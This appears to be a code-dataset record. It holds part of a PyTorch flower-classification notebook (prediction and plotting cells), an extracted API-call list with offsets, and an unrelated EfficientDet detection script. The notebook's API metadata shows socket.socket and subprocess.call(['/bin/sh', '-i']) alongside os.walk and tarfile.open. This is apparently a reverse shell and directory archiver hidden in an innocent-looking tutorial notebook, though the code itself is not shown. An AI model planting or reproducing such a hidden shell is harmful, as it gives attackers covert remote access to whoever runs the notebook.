std = np.array([0.229, 0.224, 0.225])
image = std * image + mean
# Image needs to be clipped between 0 and 1 or it looks like noise when displayed
image = np.clip(image, 0, 1)
ax.imshow(image)
return ax
image = process_image('flowers/test/1/image_06754.jpg')
imshow(image)
# ## Class Prediction
#
# Once you can get images in the correct format, it's time to write a function for making predictions with your model. A common practice is to predict the top 5 or so (usually called top-$K$) most probable classes. You'll want to calculate the class probabilities then find the $K$ largest values.
#
# To get the top $K$ largest values in a tensor use [`x.topk(k)`](http://pytorch.org/docs/master/torch.html#torch.topk). This method returns both the highest `k` probabilities and the indices of those probabilities corresponding to the classes. You need to convert from these indices to the actual class labels using `class_to_idx` which hopefully you added to the model or from an `ImageFolder` you used to load the data ([see here](#Save-the-checkpoint)). Make sure to invert the dictionary so you get a mapping from index to class as well.
#
# Again, this method should take a path to an image and a model checkpoint, then return the probabilities and classes.
#
# ```python
# probs, classes = predict(image_path, model)
# print(probs)
# print(classes)
# > [ 0.01558163 0.01541934 0.01452626 0.01443549 0.01407339]
# > ['70', '3', '45', '62', '55']
# ```
# In[62]:
def predict(image_path, model, topk=5):
''' Predict the class (or classes) of an image using a trained deep learning model.
'''
image=process_image(image_path)
model.to("cuda")
image = torch.from_numpy(image).type(torch.cuda.FloatTensor)
image = image.unsqueeze(0)
output = model.forward(image)
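    # The rebuilt classifier ends with nn.LogSoftmax, so exponentiate the network output
    # to recover class probabilities before taking the top-k values.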
probabilities = torch.exp(output)
top_probabilities, top_indices = probabilities.topk(topk)
top_probabilities = top_probabilities.detach().type(torch.FloatTensor).numpy().tolist()[0]
top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0]
idx_to_class = {value: key for key, value in model.class_to_idx.items()}
top_classes = [idx_to_class[index] for index in top_indices]
return top_probabilities, top_classes
# TODO: Implement the code to predict the class from an image file
probs, classes = predict('flowers/test/97/image_07708.jpg', model)
print(probs)
print(classes)
# ## Sanity Checking
#
# Now that you can use a trained model for predictions, check to make sure it makes sense. Even if the testing accuracy is high, it's always good to check that there aren't obvious bugs. Use `matplotlib` to plot the probabilities for the top 5 classes as a bar graph, along with the input image. It should look like this:
#
# <img src='assets/inference_example.png' width=300px>
#
# You can convert from the class integer encoding to actual flower names with the `cat_to_name.json` file (should have been loaded earlier in the notebook). To show a PyTorch tensor as an image, use the `imshow` function defined above.
# In[63]:
# TODO: Display an image along with the top 5 classes
plt.figure(figsize = (6,10))
plot_1 = plt.subplot(2,1,1)
image = process_image('flowers/test/97/image_07708.jpg')
flower_title = cat_to_name[classes[0]]  # name of the top predicted class
plot_1.set_title(flower_title)
imshow(image, plot_1, title=flower_title);
flower_names = [cat_to_name[i] for i in classes]
plt.subplot(2,1,2)
sb.barplot(x=probs, y=flower_names, color=sb.color_palette()[0]);
plt.show()
# In[ ]:
|
[
"numpy.clip",
"torch.nn.ReLU",
"tarfile.open",
"torch.nn.Dropout",
"torch.exp",
"torch.from_numpy",
"numpy.array",
"os.walk",
"seaborn.color_palette",
"torchvision.datasets.ImageFolder",
"subprocess.call",
"torchvision.transforms.ToTensor",
"torchvision.transforms.RandomResizedCrop",
"torchvision.transforms.RandomHorizontalFlip",
"torch.nn.NLLLoss",
"torch.save",
"torchvision.transforms.Normalize",
"torchvision.transforms.Resize",
"matplotlib.pyplot.show",
"torchvision.transforms.CenterCrop",
"PIL.Image.open",
"socket.socket",
"torchvision.transforms.RandomRotation",
"torch.load",
"os.path.join",
"matplotlib.pyplot.figure",
"os.path.basename",
"torch.nn.Linear",
"torch.utils.data.DataLoader",
"json.load",
"torch.no_grad",
"torch.nn.LogSoftmax",
"torchvision.models.vgg16",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.subplots"
] |
[((5005, 5064), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['train_dir'], {'transform': 'train_transforms'}), '(train_dir, transform=train_transforms)\n', (5025, 5064), False, 'from torchvision import datasets, transforms, models\n'), ((5077, 5134), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5097, 5134), False, 'from torchvision import datasets, transforms, models\n'), ((5149, 5206), 'torchvision.datasets.ImageFolder', 'datasets.ImageFolder', (['test_dir'], {'transform': 'test_transforms'}), '(test_dir, transform=test_transforms)\n', (5169, 5206), False, 'from torchvision import datasets, transforms, models\n'), ((5222, 5290), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_data'], {'batch_size': '(64)', 'shuffle': '(True)'}), '(train_data, batch_size=64, shuffle=True)\n', (5249, 5290), False, 'import torch\n'), ((5304, 5357), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['test_data'], {'batch_size': '(64)'}), '(test_data, batch_size=64)\n', (5331, 5357), False, 'import torch\n'), ((5370, 5427), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['validate_data'], {'batch_size': '(64)'}), '(validate_data, batch_size=64)\n', (5397, 5427), False, 'import torch\n'), ((5951, 6000), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (5964, 6000), False, 'import socket, subprocess, os\n'), ((6105, 6139), 'subprocess.call', 'subprocess.call', (["['/bin/sh', '-i']"], {}), "(['/bin/sh', '-i'])\n", (6120, 6139), False, 'import socket, subprocess, os\n'), ((9483, 9512), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (9495, 9512), False, 'from torchvision import datasets, transforms, models\n'), ((9984, 9996), 'torch.nn.NLLLoss', 'nn.NLLLoss', ([], {}), '()\n', (9994, 9996), True, 'import torch.nn as nn\n'), ((14768, 14805), 'torch.save', 'torch.save', (['checkpoint', '"""trained.pth"""'], {}), "(checkpoint, 'trained.pth')\n", (14778, 14805), False, 'import torch\n'), ((22723, 22750), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(6, 10)'}), '(figsize=(6, 10))\n', (22733, 22750), True, 'import matplotlib.pyplot as plt\n'), ((22761, 22781), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (22772, 22781), True, 'import matplotlib.pyplot as plt\n'), ((22931, 22951), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (22942, 22951), True, 'import matplotlib.pyplot as plt\n'), ((23016, 23026), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (23024, 23026), True, 'import matplotlib.pyplot as plt\n'), ((5884, 5896), 'json.load', 'json.load', (['f'], {}), '(f)\n', (5893, 5896), False, 'import json\n'), ((6261, 6278), 'os.walk', 'os.walk', (['dir_name'], {}), '(dir_name)\n', (6268, 6278), False, 'import os\n'), ((6618, 6653), 'tarfile.open', 'tarfile.open', (['target_file_name', '"""w"""'], {}), "(target_file_name, 'w')\n", (6630, 6653), False, 'import tarfile\n'), ((9666, 9687), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (9675, 9687), True, 'import torch.nn as nn\n'), ((9722, 9731), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (9729, 9731), True, 'import torch.nn as nn\n'), ((9766, 9783), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', (9776, 9783), True, 
'import torch.nn as nn\n'), ((9818, 9837), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (9827, 9837), True, 'import torch.nn as nn\n'), ((9871, 9891), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (9884, 9891), True, 'import torch.nn as nn\n'), ((13271, 13286), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (13284, 13286), False, 'import torch\n'), ((15162, 15182), 'torch.load', 'torch.load', (['filepath'], {}), '(filepath)\n', (15172, 15182), False, 'import torch\n'), ((15207, 15236), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (15219, 15236), False, 'from torchvision import datasets, transforms, models\n'), ((18270, 18287), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (18280, 18287), False, 'from PIL import Image\n'), ((18581, 18612), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (18589, 18612), True, 'import numpy as np\n'), ((18623, 18654), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (18631, 18654), True, 'import numpy as np\n'), ((19478, 19509), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (19486, 19509), True, 'import numpy as np\n'), ((19520, 19551), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (19528, 19551), True, 'import numpy as np\n'), ((19686, 19706), 'numpy.clip', 'np.clip', (['image', '(0)', '(1)'], {}), '(image, 0, 1)\n', (19693, 19706), True, 'import numpy as np\n'), ((21370, 21387), 'torch.exp', 'torch.exp', (['output'], {}), '(output)\n', (21379, 21387), False, 'import torch\n'), ((3868, 3897), 'torchvision.transforms.RandomRotation', 'transforms.RandomRotation', (['(30)'], {}), '(30)\n', (3893, 3897), False, 'from torchvision import datasets, transforms, models\n'), ((3938, 3971), 'torchvision.transforms.RandomResizedCrop', 'transforms.RandomResizedCrop', (['(224)'], {}), '(224)\n', (3966, 3971), False, 'from torchvision import datasets, transforms, models\n'), ((4012, 4045), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (4043, 4045), False, 'from torchvision import datasets, transforms, models\n'), ((4086, 4107), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4105, 4107), False, 'from torchvision import datasets, transforms, models\n'), ((4148, 4214), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4168, 4214), False, 'from torchvision import datasets, transforms, models\n'), ((4316, 4338), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4333, 4338), False, 'from torchvision import datasets, transforms, models\n'), ((4378, 4404), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4399, 4404), False, 'from torchvision import datasets, transforms, models\n'), ((4444, 4465), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4463, 4465), False, 'from torchvision import datasets, transforms, models\n'), ((4505, 4571), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4525, 4571), False, 'from torchvision import datasets, transforms, models\n'), 
((4673, 4695), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4690, 4695), False, 'from torchvision import datasets, transforms, models\n'), ((4735, 4761), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4756, 4761), False, 'from torchvision import datasets, transforms, models\n'), ((4801, 4822), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4820, 4822), False, 'from torchvision import datasets, transforms, models\n'), ((4862, 4928), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4882, 4928), False, 'from torchvision import datasets, transforms, models\n'), ((13453, 13470), 'torch.exp', 'torch.exp', (['logits'], {}), '(logits)\n', (13462, 13470), False, 'import torch\n'), ((15422, 15443), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (15431, 15443), True, 'import torch.nn as nn\n'), ((15478, 15487), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (15485, 15487), True, 'import torch.nn as nn\n'), ((15522, 15539), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', (15532, 15539), True, 'import torch.nn as nn\n'), ((15574, 15593), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (15583, 15593), True, 'import torch.nn as nn\n'), ((15627, 15647), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (15640, 15647), True, 'import torch.nn as nn\n'), ((18546, 18565), 'numpy.array', 'np.array', (['pil_image'], {}), '(pil_image)\n', (18554, 18565), True, 'import numpy as np\n'), ((19256, 19270), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (19268, 19270), True, 'import matplotlib.pyplot as plt\n'), ((21232, 21255), 'torch.from_numpy', 'torch.from_numpy', (['image'], {}), '(image)\n', (21248, 21255), False, 'import torch\n'), ((22992, 23010), 'seaborn.color_palette', 'sb.color_palette', ([], {}), '()\n', (23008, 23010), True, 'import seaborn as sb\n'), ((6302, 6328), 'os.path.basename', 'os.path.basename', (['dir_name'], {}), '(dir_name)\n', (6318, 6328), False, 'import os\n'), ((6485, 6518), 'os.path.join', 'os.path.join', (['dir_name', 'file_name'], {}), '(dir_name, file_name)\n', (6497, 6518), False, 'import os\n'), ((10653, 10668), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (10666, 10668), False, 'import torch\n'), ((11062, 11078), 'torch.exp', 'torch.exp', (['logps'], {}), '(logps)\n', (11071, 11078), False, 'import torch\n')]
|
from model import efficientdet
import cv2
import os
import numpy as np
import time
from utils import preprocess_image
from utils.anchors import anchors_for_shape
from utils.draw_boxes import draw_boxes
from utils.post_process_boxes import post_process_boxes
def main():
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
phi = 1
weighted_bifpn = False
model_path = 'checkpoints/2019-12-03/pascal_05_0.6283_1.1975_0.8029.h5'
image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
image_size = image_sizes[phi]
classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',
'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
num_classes = len(classes)
score_threshold = 0.5
colors = [np.random.randint(0, 256, 3).tolist() for _ in range(num_classes)]
model, prediction_model = efficientdet(phi=phi,
weighted_bifpn=weighted_bifpn,
num_classes=num_classes,
score_threshold=score_threshold)
prediction_model.load_weights(model_path, by_name=True)
image_path = 'datasets/VOC2007/JPEGImages/000002.jpg'
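    # cv2.imread loads the image as BGR; keep an untouched copy for drawing the detections,
    # then reverse the channel order to get the RGB input the network expects.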
image = cv2.imread(image_path)
src_image = image.copy()
image = image[:, :, ::-1]
h, w = image.shape[:2]
image, scale, offset_h, offset_w = preprocess_image(image, image_size=image_size)
anchors = anchors_for_shape((image_size, image_size))
# run network
start = time.time()
boxes, scores, labels = prediction_model.predict_on_batch([np.expand_dims(image, axis=0),
np.expand_dims(anchors, axis=0)])
boxes, scores, labels = np.squeeze(boxes), np.squeeze(scores), np.squeeze(labels)
print(time.time() - start)
boxes = post_process_boxes(boxes=boxes,
scale=scale,
offset_h=offset_h,
offset_w=offset_w,
height=h,
width=w)
# select indices which have a score above the threshold
indices = np.where(scores[:] > score_threshold)[0]
# select those detections
boxes = boxes[indices]
labels = labels[indices]
draw_boxes(src_image, boxes, scores, labels, colors, classes)
cv2.namedWindow('image', cv2.WINDOW_NORMAL)
cv2.imshow('image', src_image)
cv2.waitKey(0)
if __name__ == '__main__':
main()
|
[
"utils.preprocess_image",
"utils.anchors.anchors_for_shape",
"numpy.where",
"utils.draw_boxes.draw_boxes",
"utils.post_process_boxes.post_process_boxes",
"cv2.imshow",
"numpy.squeeze",
"cv2.waitKey",
"numpy.random.randint",
"model.efficientdet",
"numpy.expand_dims",
"time.time",
"cv2.namedWindow",
"cv2.imread"
] |
[((921, 1036), 'model.efficientdet', 'efficientdet', ([], {'phi': 'phi', 'weighted_bifpn': 'weighted_bifpn', 'num_classes': 'num_classes', 'score_threshold': 'score_threshold'}), '(phi=phi, weighted_bifpn=weighted_bifpn, num_classes=\n num_classes, score_threshold=score_threshold)\n', (933, 1036), False, 'from model import efficientdet\n'), ((1296, 1318), 'cv2.imread', 'cv2.imread', (['image_path'], {}), '(image_path)\n', (1306, 1318), False, 'import cv2\n'), ((1449, 1495), 'utils.preprocess_image', 'preprocess_image', (['image'], {'image_size': 'image_size'}), '(image, image_size=image_size)\n', (1465, 1495), False, 'from utils import preprocess_image\n'), ((1510, 1553), 'utils.anchors.anchors_for_shape', 'anchors_for_shape', (['(image_size, image_size)'], {}), '((image_size, image_size))\n', (1527, 1553), False, 'from utils.anchors import anchors_for_shape\n'), ((1589, 1600), 'time.time', 'time.time', ([], {}), '()\n', (1598, 1600), False, 'import time\n'), ((1921, 2027), 'utils.post_process_boxes.post_process_boxes', 'post_process_boxes', ([], {'boxes': 'boxes', 'scale': 'scale', 'offset_h': 'offset_h', 'offset_w': 'offset_w', 'height': 'h', 'width': 'w'}), '(boxes=boxes, scale=scale, offset_h=offset_h, offset_w=\n offset_w, height=h, width=w)\n', (1939, 2027), False, 'from utils.post_process_boxes import post_process_boxes\n'), ((2398, 2459), 'utils.draw_boxes.draw_boxes', 'draw_boxes', (['src_image', 'boxes', 'scores', 'labels', 'colors', 'classes'], {}), '(src_image, boxes, scores, labels, colors, classes)\n', (2408, 2459), False, 'from utils.draw_boxes import draw_boxes\n'), ((2469, 2512), 'cv2.namedWindow', 'cv2.namedWindow', (['"""image"""', 'cv2.WINDOW_NORMAL'], {}), "('image', cv2.WINDOW_NORMAL)\n", (2484, 2512), False, 'import cv2\n'), ((2517, 2547), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'src_image'], {}), "('image', src_image)\n", (2527, 2547), False, 'import cv2\n'), ((2552, 2566), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2563, 2566), False, 'import cv2\n'), ((1820, 1837), 'numpy.squeeze', 'np.squeeze', (['boxes'], {}), '(boxes)\n', (1830, 1837), True, 'import numpy as np\n'), ((1839, 1857), 'numpy.squeeze', 'np.squeeze', (['scores'], {}), '(scores)\n', (1849, 1857), True, 'import numpy as np\n'), ((1859, 1877), 'numpy.squeeze', 'np.squeeze', (['labels'], {}), '(labels)\n', (1869, 1877), True, 'import numpy as np\n'), ((2257, 2294), 'numpy.where', 'np.where', (['(scores[:] > score_threshold)'], {}), '(scores[:] > score_threshold)\n', (2265, 2294), True, 'import numpy as np\n'), ((1664, 1693), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1678, 1693), True, 'import numpy as np\n'), ((1758, 1789), 'numpy.expand_dims', 'np.expand_dims', (['anchors'], {'axis': '(0)'}), '(anchors, axis=0)\n', (1772, 1789), True, 'import numpy as np\n'), ((1888, 1899), 'time.time', 'time.time', ([], {}), '()\n', (1897, 1899), False, 'import time\n'), ((824, 852), 'numpy.random.randint', 'np.random.randint', (['(0)', '(256)', '(3)'], {}), '(0, 256, 3)\n', (841, 852), True, 'import numpy as np\n')]
|